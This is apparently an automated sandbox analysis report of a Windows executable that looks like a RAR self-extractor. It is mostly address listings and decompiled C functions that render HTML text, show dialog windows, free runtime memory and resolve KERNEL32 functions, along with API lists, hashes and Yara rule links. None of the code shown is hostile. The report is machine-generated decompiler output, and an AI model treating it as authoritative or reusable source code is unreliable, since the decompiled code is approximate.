                0x00000000
                0x00cbb96f
                0x00cbb8a7
                0x00cbb8a7
                0x00cbb8ac
                0x00000000
                0x00000000
                0x00000000
                0x00cbb8ac
                0x00cbb872
                0x00cbb872
                0x00cbb876
                0x00000000
                0x00000000
                0x00cbb878
                0x00cbb878
                0x00cbb87b
                0x00cbb87d
                0x00cbb880
                0x00000000
                0x00000000
                0x00cbb886
                0x00cbb88f
                0x00000000
                0x00cbb88f
                0x00000000
                0x00cbba2b
                0x00cbba2b
                0x00cbba2c
                0x00cbba31
                0x00cbba33
                0x00cbba36
                0x00cbba36
                0x00000000
                0x00cbba6c
                0x00cbba6c
                0x00cbba73
                0x00cbba75
                0x00cbba75
                0x00cbba77
                0x00cbbaa6
                0x00cbbaa6
                0x00cbbaac
                0x00000000
                0x00cbbaac
                0x00cbba79
                0x00cbba79
                0x00cbba79
                0x00cbba7c
                0x00cbba95
                0x00cbba95
                0x00cbba9b
                0x00cbba9b
                0x00000000
                0x00cbba9b
                0x00cbba7e
                0x00cbba7e
                0x00cbba7e
                0x00cbba81
                0x00000000
                0x00000000
                0x00cbba83
                0x00cbba83
                0x00cbba83
                0x00cbba86
                0x00000000
                0x00000000
                0x00cbba8c
                0x00cbba8c
                0x00000000
                0x00000000
                0x00cbbaf9
                0x00cbbaf9
                0x00cbbafc
                0x00000000
                0x00000000
                0x00cbbafe
                0x00cbbafe
                0x00cbbb0a
                0x00cbbb0f
                0x00cbbb10
                0x00cbbb11
                0x00cbbb13
                0x00000000
                0x00000000
                0x00cbbb15
                0x00cbbb15
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cbbd07
                0x00cbbd07
                0x00cbbd0a
                0x00cbbd0c
                0x00cbbd13
                0x00cbbd15
                0x00cbbd1b
                0x00cbbd1c
                0x00cbbd21
                0x00cbbd22
                0x00cbbd22
                0x00cbbd27
                0x00cbbd2a
                0x00cbbd30
                0x00cbbd30
                0x00cbbd35
                0x00000000
                0x00000000
                0x00cbbd41
                0x00cbbd41
                0x00cbbd44
                0x00cbbb25
                0x00cbbb25
                0x00000000
                0x00cbbb25
                0x00cbbd4a
                0x00cbbd4a
                0x00cbbb16
                0x00cbbb16
                0x00cbbb1c
                0x00cbbb1d
                0x00cbbb20
                0x00000000
                0x00000000
                0x00cbbd51
                0x00cbbd51
                0x00cbbd54
                0x00000000
                0x00000000
                0x00cbbd5a
                0x00cbbd5a
                0x00cbbd5c
                0x00cbbd63
                0x00cbbd6b
                0x00cbbd71
                0x00cbbd76
                0x00cbbd79
                0x00cbbdae
                0x00cbbdb3
                0x00cbbdb9
                0x00cbbdba
                0x00cbbdbf
                0x00cbbd7b
                0x00cbbd7b
                0x00cbbd7e
                0x00cbbd84
                0x00cbbd9a
                0x00cbbd9f
                0x00cbbda0
                0x00cbbda5
                0x00cbbd86
                0x00cbbd86
                0x00cbbd8b
                0x00cbbd8c
                0x00cbbd91
                0x00cbbd91
                0x00cbbd84
                0x00cbbdc6
                0x00cbbdc8
                0x00cbbdcf
                0x00cbbddd
                0x00cbbde4
                0x00cbbde9
                0x00cbbdea
                0x00cbbdeb
                0x00cbbded
                0x00cbbdee
                0x00cbbdf5
                0x00cbbe3e
                0x00cbbe45
                0x00cbbe4a
                0x00cbbe4c
                0x00000000
                0x00000000
                0x00cbbe52
                0x00cbbe52
                0x00cbbe54
                0x00cbbe5a
                0x00cbbe61
                0x00000000
                0x00000000
                0x00cbbe63
                0x00cbbe63
                0x00cbbe65
                0x00cbbe66
                0x00cbbe66
                0x00cbbe66
                0x00cbbe69
                0x00cbbe6c
                0x00cbbe76
                0x00cbbe76
                0x00cbbe78
                0x00cbbe7a
                0x00cbbe84
                0x00cbbe89
                0x00cbbe8b
                0x00cbbec9
                0x00cbbec9
                0x00cbbecc
                0x00cbbecc
                0x00cbbece
                0x00cbbecf
                0x00cbbecf
                0x00000000
                0x00cbbecf
                0x00cbbe8d
                0x00cbbe8d
                0x00cbbe8f
                0x00cbbe90
                0x00cbbe92
                0x00cbbe95
                0x00cbbeaa
                0x00cbbeaa
                0x00cbbeac
                0x00cbbead
                0x00cbbead
                0x00cbbead
                0x00cbbeb0
                0x00cbbeb0
                0x00cbbeb5
                0x00cbbeb6
                0x00cbbebc
                0x00cbbebc
                0x00cbbebd
                0x00cbbec2
                0x00cbbec3
                0x00cbbec4
                0x00000000
                0x00cbbec4
                0x00cbbe97
                0x00cbbe97
                0x00cbbe9e
                0x00cbbea1
                0x00cbbea2
                0x00000000
                0x00cbbea2
                0x00cbbe6e
                0x00cbbe6e
                0x00cbbe70
                0x00cbbe71
                0x00cbbe74
                0x00000000
                0x00000000
                0x00000000
                0x00cbbed1
                0x00cbbed1
                0x00cbbed4
                0x00cbbed4
                0x00cbbed9
                0x00cbbedb
                0x00cbbedd
                0x00cbbedd
                0x00cbbedf
                0x00cbbedf
                0x00000000
                0x00cbbdf7
                0x00cbbdf7
                0x00cbbdfe
                0x00cbbe0a
                0x00cbbe10
                0x00cbbe11
                0x00cbbe12
                0x00cbbe17
                0x00cbbe1a
                0x00cbbe1c
                0x00cbbe22
                0x00cbbe24
                0x00cbbe32
                0x00cbbe37
                0x00cbbe38
                0x00cbbe38
                0x00cbbee2
                0x00cbbee2
                0x00cbbeea
                0x00cbbeef
                0x00cbbef1
                0x00cbbef2
                0x00cbbef8
                0x00cbbef9
                0x00cbbeff
                0x00cbbf00
                0x00cbbf00
                0x00cbbf05
                0x00cbbf06
                0x00cbbf0c
                0x00cbbf0d
                0x00cbbf13
                0x00cbbf14
                0x00cbbf19
                0x00cbbf21
                0x00cbbf2d
                0x00cbbf2d
                0x00cbbf3a
                0x00cbbf3f
                0x00cbbf47
                0x00cbbf51
                0x00cbbf5e
                0x00cbbf65
                0x00cbbf65
                0x00cbbf71
                0x00cbbf78
                0x00cbbf7d
                0x00cbbf85
                0x00cbbf8b
                0x00cbbf8c
                0x00cbbf8d
                0x00cbbf8f
                0x00cbbf8f
                0x00cbbfa4
                0x00cbbfa9
                0x00cbbfb5
                0x00cbbfb7
                0x00cbbfc8
                0x00cbbfd5
                0x00000000
                0x00cbbfb9
                0x00cbbfb9
                0x00cbbfc4
                0x00cbbfc6
                0x00cbbfda
                0x00cbbfda
                0x00cbbfdc
                0x00cbbfe2
                0x00cbbfe8
                0x00cbbff6
                0x00cbbffb
                0x00cbbffc
                0x00cbc004
                0x00cbc009
                0x00cbc010
                0x00cbc016
                0x00cbc018
                0x00cbc01e
                0x00cbc024
                0x00cbc026
                0x00cbc02f
                0x00cbc032
                0x00cbc034
                0x00cbc03d
                0x00cbc040
                0x00cbc046
                0x00cbc049
                0x00cbc052
                0x00cbc061
                0x00cbc066
                0x00cbc06e
                0x00cbc070
                0x00cbc071
                0x00cbc077
                0x00cbc078
                0x00cbc07a
                0x00cbc07f
                0x00cbc07f
                0x00000000
                0x00cbc06e
                0x00000000
                0x00cbbfc6
                0x00cbbfb7
                0x00000000
                0x00cbc087
                0x00cbc087
                0x00cbc08a
                0x00cbc08c
                0x00cbc08c
                0x00000000
                0x00000000
                0x00cbbab8
                0x00cbbab8
                0x00cbbac0
                0x00cbbac6
                0x00cbbac9
                0x00cbbaed
                0x00cbbacb
                0x00cbbacb
                0x00cbbace
                0x00cbbae1
                0x00cbbad0
                0x00cbbad0
                0x00cbbad2
                0x00cbbad7
                0x00cbbad7
                0x00cbbace
                0x00000000
                0x00000000
                0x00cbbb31
                0x00cbbb31
                0x00cbbb32
                0x00cbbb37
                0x00cbbb37
                0x00cbbb37
                0x00cbbb3a
                0x00cbbb3f
                0x00cbbb45
                0x00cbbb45
                0x00cbbb4b
                0x00cbbb51
                0x00cbbb51
                0x00000000
                0x00000000
                0x00cbb52a
                0x00cbb52c
                0x00cbb531
                0x00cbb537
                0x00cbb53a
                0x00000000
                0x00cbb53c
                0x00cbb53c
                0x00000000
                0x00cbb53c
                0x00cbb53a
                0x00cbc0c4
                0x00cbc0ca
                0x00cbc0d4
                0x00cbc0d4
                0x00cbbbd9
                0x00cbbbd9
                0x00cbbbe0
                0x00000000
                0x00000000
                0x00cbbbe6
                0x00cbbbe6
                0x00cbbbe8
                0x00cbbbef
                0x00cbbbf7
                0x00cbbbf8
                0x00cbbbfd
                0x00cbbbfe
                0x00cbbbff
                0x00cbbc01
                0x00cbbc55
                0x00cbbc55
                0x00cbbc5d
                0x00cbbc6b
                0x00cbbc7c
                0x00cbbc8a
                0x00cbbc8a
                0x00cbbc96
                0x00cbbc9b
                0x00cbbc9d
                0x00cbbcad
                0x00cbbcb7
                0x00cbbcbc
                0x00cbbcbf
                0x00000000
                0x00cbbcc5
                0x00cbbcc5
                0x00cbbcca
                0x00cbbcca
                0x00cbbccc
                0x00cbbcd3
                0x00cbbcd9
                0x00000000
                0x00cbbcd9
                0x00cbbcbf
                0x00cbbc03
                0x00cbbc05
                0x00cbbc07
                0x00cbbc0e
                0x00000000
                0x00000000
                0x00cbbc10
                0x00cbbc10
                0x00cbbc12
                0x00cbbc18
                0x00cbbc18
                0x00cbbc18
                0x00cbbc1c
                0x00000000
                0x00000000
                0x00cbbc1e
                0x00cbbc1e
                0x00cbbc1f
                0x00cbbc25
                0x00cbbc28
                0x00cbbc2a
                0x00cbbc2d
                0x00000000
                0x00000000
                0x00cbbc2f
                0x00000000
                0x00cbbc2f
                0x00cbbc31
                0x00cbbc3c
                0x00cbbc46
                0x00cbbc4b
                0x00cbbc4b
                0x00cbbc4d
                0x00000000
                0x00cbbcdf
                0x00cbbcdf
                0x00cbbce2
                0x00cbbce8
                0x00cbbcef
                0x00cbbcf1
                0x00cbbcf1
                0x00cbbcfb
                0x00cbbcfb
                0x00000000
                0x00cbbce2

                APIs
                • GetTempPathW.KERNEL32(00000800,?), ref: 00CBBB71
                • _swprintf.LIBCMT ref: 00CBBBA5
                  • Part of subcall function 00CA3E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CA3E54
                • SetDlgItemTextW.USER32(?,00000066,00CE85FA), ref: 00CBBBC5
                • _wcschr.LIBVCRUNTIME ref: 00CBBBF8
                • EndDialog.USER32(?,00000001), ref: 00CBBCD9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                • String ID: %s%s%u
                • API String ID: 2892007947-1360425832
                • Opcode ID: 1d50e084bf46c0efa418ca8dc5addf089f1c41a404fe06ec2f21ee98cff8e40d
                • Instruction ID: fd3ecfdf03baa769e90e524fc3f40986cbbe6acc1e1e45a56bd63038c997261d
                • Opcode Fuzzy Hash: 1d50e084bf46c0efa418ca8dc5addf089f1c41a404fe06ec2f21ee98cff8e40d
                • Instruction Fuzzy Hash: F2415C7294025AAEEF25DB64DD85FEE7BB8EB04304F0040A6F519E6051EFB09F889F51
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB88BF, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 82%
                			E00CB88BF(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E00CB87A5(_t60);
				_push(0x200 + E00CC2B33(_t60) * 2);
				_t24 = E00CC2B53(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00CC4D7E(_t64, L"<html>");
				E00CC66ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00CC66ED(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E00CB1432(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E00CC66ED(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E00CC66ED(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E00CB8ACA(_t58, _t79);
					}
					_t69 = 9 + E00CC2B33(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00CC2B4E(_t64);
					_t24 =  *0xcddff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E00CB87DC( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}



















                0x00cb88bf
                0x00cb88c2
                0x00cb88c8
                0x00cb8a04
                0x00cb8a04
                0x00cb88ce
                0x00cb88d5
                0x00cb88e0
                0x00cb88f0
                0x00cb88f1
                0x00cb88f6
                0x00cb88fc
                0x00cb89ff
                0x00000000
                0x00cb8a00
                0x00cb8909
                0x00cb8914
                0x00cb891f
                0x00cb8924
                0x00cb8927
                0x00cb892b
                0x00cb892f
                0x00cb893a
                0x00cb8942
                0x00cb8949
                0x00cb894b
                0x00cb894d
                0x00cb8951
                0x00cb8953
                0x00cb8953
                0x00cb8958
                0x00cb8964
                0x00cb896c
                0x00cb8972
                0x00cb8973
                0x00cb8978
                0x00cb897a
                0x00cb8982
                0x00cb8982
                0x00cb898e
                0x00cb899a
                0x00cb899e
                0x00cb89a8
                0x00cb89bd
                0x00cb89ca
                0x00cb89bf
                0x00cb89bf
                0x00cb89c4
                0x00cb89c4
                0x00cb89bd
                0x00cb89ce
                0x00cb89dc
                0x00cb89e5
                0x00cb89f0
                0x00cb89f5
                0x00cb89fc
                0x00cb89fc
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00cb8931
                0x00cb8931
                0x00cb8931
                0x00cb8934
                0x00cb8934
                0x00000000

                APIs
                • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00CB87A0), ref: 00CB8994
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00CB89B5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: AllocByteCharGlobalMultiWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 3286310052-4209811716
                • Opcode ID: e87c30c7c1b7d7f8c8be71fb53eaac95b743ab19d2d4a9121ca12a64d649ea6e
                • Instruction ID: 44d6264d6f6288178adca9ae9896296139695f25d2572b3c7ff0aab5ba7a37ab
                • Opcode Fuzzy Hash: e87c30c7c1b7d7f8c8be71fb53eaac95b743ab19d2d4a9121ca12a64d649ea6e
                • Instruction Fuzzy Hash: 153101329043427EEB15AB60DC06FAFB79CDF41720F14851EF521961C2EF709A09D7A6
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CB8FE6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00CB8FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00CB8D3F(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00CC2B4E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00CC668C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0xcddf88(0,  *0xcddfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0xcddf90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0xcddf98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xcddfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0xcddf8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00CB8E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00CC2B4E(_t65);
							}
						}
					}
				}
				return _t43;
			}














                0x00cb8fef
                0x00cb8ff3
                0x00cb8ff9
                0x00cb8ffc
                0x00cb8fff
                0x00cb900b
                0x00cb9014
                0x00cb9019
                0x00cb901e
                0x00cb9024
                0x00cb902a
                0x00cb902e
                0x00cb9026
                0x00cb9026
                0x00cb9026
                0x00cb9034
                0x00cb903b
                0x00cb9044
                0x00cb905b
                0x00cb9065
                0x00cb906a
                0x00cb906a
                0x00cb9070
                0x00cb907e
                0x00cb90ab
                0x00cb90b1
                0x00cb90b8
                0x00cb90f2
                0x00cb90f4
                0x00cb90f9
                0x00000000
                0x00cb9102
                0x00cb90ba
                0x00cb90bc
                0x00cb90c3
                0x00cb90c6
                0x00cb90cd
                0x00cb90d2
                0x00cb90d6
                0x00cb90db
                0x00cb90e3
                0x00000000
                0x00cb90ef
                0x00cb90d6
                0x00cb90c6
                0x00cb90bc
                0x00cb910e

                APIs
                • ShowWindow.USER32(?,00000000), ref: 00CB8FFF
                • GetWindowRect.USER32(?,00000000), ref: 00CB9044
                • ShowWindow.USER32(?,00000005,00000000), ref: 00CB90DB
                • SetWindowTextW.USER32(?,00000000), ref: 00CB90E3
                • ShowWindow.USER32(00000000,00000005), ref: 00CB90F9
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: Window$Show$RectText
                • String ID: RarHtmlClassName
                • API String ID: 3937224194-1658105358
                • Opcode ID: ca19f72df77665ebb269dfa1af1b5a7edee8b51a394988bf9ec54722d1ee082a
                • Instruction ID: 5ac71bef33245fc986b126357c45dc15558ee31642760cd35a4cc3d6907ad919
                • Opcode Fuzzy Hash: ca19f72df77665ebb269dfa1af1b5a7edee8b51a394988bf9ec54722d1ee082a
                • Instruction Fuzzy Hash: 2D31B031405310AFCB21AFA4DC8CF9FBBA8EF48711F00455AFA5B9A1A6CB31D940DB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CCB506, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00CCB506(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00CCB4CA(_t45, 7);
					E00CCB4CA(_t45 + 0x1c, 7);
					E00CCB4CA(_t45 + 0x38, 0xc);
					E00CCB4CA(_t45 + 0x68, 0xc);
					E00CCB4CA(_t45 + 0x98, 2);
					E00CC7A50( *((intOrPtr*)(_t45 + 0xa0)));
					E00CC7A50( *((intOrPtr*)(_t45 + 0xa4)));
					E00CC7A50( *((intOrPtr*)(_t45 + 0xa8)));
					E00CCB4CA(_t45 + 0xb4, 7);
					E00CCB4CA(_t45 + 0xd0, 7);
					E00CCB4CA(_t45 + 0xec, 0xc);
					E00CCB4CA(_t45 + 0x11c, 0xc);
					E00CCB4CA(_t45 + 0x14c, 2);
					E00CC7A50( *((intOrPtr*)(_t45 + 0x154)));
					E00CC7A50( *((intOrPtr*)(_t45 + 0x158)));
					E00CC7A50( *((intOrPtr*)(_t45 + 0x15c)));
					return E00CC7A50( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                0x00ccb50c
                0x00ccb511
                0x00ccb51a
                0x00ccb525
                0x00ccb530
                0x00ccb53b
                0x00ccb549
                0x00ccb554
                0x00ccb55f
                0x00ccb56a
                0x00ccb578
                0x00ccb586
                0x00ccb597
                0x00ccb5a5
                0x00ccb5b3
                0x00ccb5be
                0x00ccb5c9
                0x00ccb5d4
                0x00000000
                0x00ccb5e4
                0x00ccb5e9

                APIs
                  • Part of subcall function 00CCB4CA: _free.LIBCMT ref: 00CCB4F3
                • _free.LIBCMT ref: 00CCB554
                  • Part of subcall function 00CC7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?), ref: 00CC7A66
                  • Part of subcall function 00CC7A50: GetLastError.KERNEL32(?,?,00CCB4F8,?,00000000,?,00000000,?,00CCB51F,?,00000007,?,?,00CCB91C,?,?), ref: 00CC7A78
                • _free.LIBCMT ref: 00CCB55F
                • _free.LIBCMT ref: 00CCB56A
                • _free.LIBCMT ref: 00CCB5BE
                • _free.LIBCMT ref: 00CCB5C9
                • _free.LIBCMT ref: 00CCB5D4
                • _free.LIBCMT ref: 00CCB5DF
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                • Instruction ID: 6beeb7079fb06f6c1fdfdddbc79df00d48f9ea64d50941cb8809e154aba29e7b
                • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                • Instruction Fuzzy Hash: AB11FC72948B04AAD664F7B1CC0BFCF779CAF04B40F40591DF79E66053DB69BA046A60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CC1694, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00CC1694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xcdd680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00CC288E(__eflags,  *0xcdd680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00CC28C8(__eflags,  *0xcdd680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00CC7B1B(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00CC28C8(__eflags,  *0xcdd680, 0);
								} else {
									__eflags = E00CC28C8(__eflags,  *0xcdd680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00CC7A50(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                0x00cc169b
                0x00cc16ae
                0x00cc16b5
                0x00cc16b8
                0x00cc16bb
                0x00cc16d4
                0x00cc16d4
                0x00cc16bd
                0x00cc16bd
                0x00cc16bf
                0x00cc16c9
                0x00cc16cf
                0x00cc16d0
                0x00cc16d2
                0x00cc16e2
                0x00cc16e6
                0x00cc16e8
                0x00cc16fc
                0x00cc16fc
                0x00cc1705
                0x00cc16ea
                0x00cc16f8
                0x00cc16fa
                0x00cc170e
                0x00cc1710
                0x00cc1710
                0x00000000
                0x00000000
                0x00000000
                0x00cc16fa
                0x00cc1713
                0x00000000
                0x00000000
                0x00000000
                0x00cc16d2
                0x00cc16bf
                0x00cc171b
                0x00cc1725
                0x00cc169d
                0x00cc169f
                0x00cc169f

                APIs
                • GetLastError.KERNEL32(?,?,00CC168B,00CBF0E2), ref: 00CC16A2
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CC16B0
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CC16C9
                • SetLastError.KERNEL32(00000000,?,00CC168B,00CBF0E2), ref: 00CC171B
                Memory Dump Source
                • Source File: 00000000.00000002.333693439.0000000000CA1000.00000020.00020000.sdmp, Offset: 00CA0000, based on PE: true
                • Associated: 00000000.00000002.333689500.0000000000CA0000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333717935.0000000000CD2000.00000002.00020000.sdmp Download File
                • Associated: 00000000.00000002.333726734.0000000000CDD000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333732087.0000000000CE4000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333738140.0000000000D00000.00000004.00020000.sdmp Download File
                • Associated: 00000000.00000002.333742425.0000000000D01000.00000002.00020000.sdmp Download File
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: e085aa99e9b83ec6db756024ac4b6824a439012843201f6143c0242055760c2e
                • Instruction ID: e4399bfd908bc76df8d313c4b74b9f78cccbcd5e96c5a6c438fe705f650d3572
                • Opcode Fuzzy Hash: e085aa99e9b83ec6db756024ac4b6824a439012843201f6143c0242055760c2e
                • Instruction Fuzzy Hash: 0901D83364A2115FA7152A76FC85F1A6B58EB12375338062EF925851E3EF518C416294
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00CBD27B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 77%
                			E00CBD27B() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xcffe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xcffe5c = _t3;
